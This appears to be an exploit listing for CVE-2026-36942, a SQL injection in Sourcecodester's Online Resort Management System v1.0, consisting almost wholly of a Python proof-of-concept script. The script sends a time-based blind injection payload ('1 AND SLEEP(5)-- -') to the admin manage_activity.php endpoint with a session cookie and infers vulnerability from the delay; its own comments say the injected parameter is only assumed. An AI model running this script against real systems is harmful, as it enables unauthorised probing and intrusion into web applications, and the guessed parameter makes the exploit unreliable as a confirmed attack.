CVE-2026-36942: Online Resort Management System SQL注入漏洞

import requests # Exploit Title: Sourcecodester Online Resort Management System v1.0 - SQL Injection # Date: 2026-04-13 # Exploit Author: Analyst # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14586/online-resort-management-system-using-phpmysqli-source-code.html # Version: v1.0 # Tested on: Ubuntu/Apache # CVE: CVE-2026-36942 def check_sqli(target_url, session_cookie): """ Tests for SQL Injection in manage_activity.php. Note: High Privileges (Admin) are required based on CVE details. """ # The vulnerable endpoint full_url = f"{target_url}/orms/admin/activities/manage_activity.php" # Headers with simulated admin session headers = { "Cookie": f"PHPSESSID={session_cookie}", "User-Agent": "Mozilla/5.0 (CVE-Analyzer)" } # Payload: Time-based blind injection (Sleep 5 seconds) # Assuming the parameter is 'id' based on common patterns in this CMS payload = { "id": "1 AND SLEEP(5)-- -" } try: print(f"[*] Sending payload to {full_url}...") response = requests.post(full_url, data=payload, headers=headers, timeout=10) # Check if response time indicates successful injection if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability Confirmed: SQL Injection detected via time delay.") print("[+] The application is vulnerable to SQL Injection on the 'id' parameter.") else: print("[-] Vulnerability not detected or insufficient privileges.") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": # Replace with target URL and valid admin session ID target = "http://localhost" session = "valid_admin_session_id_here" check_sqli(target, session)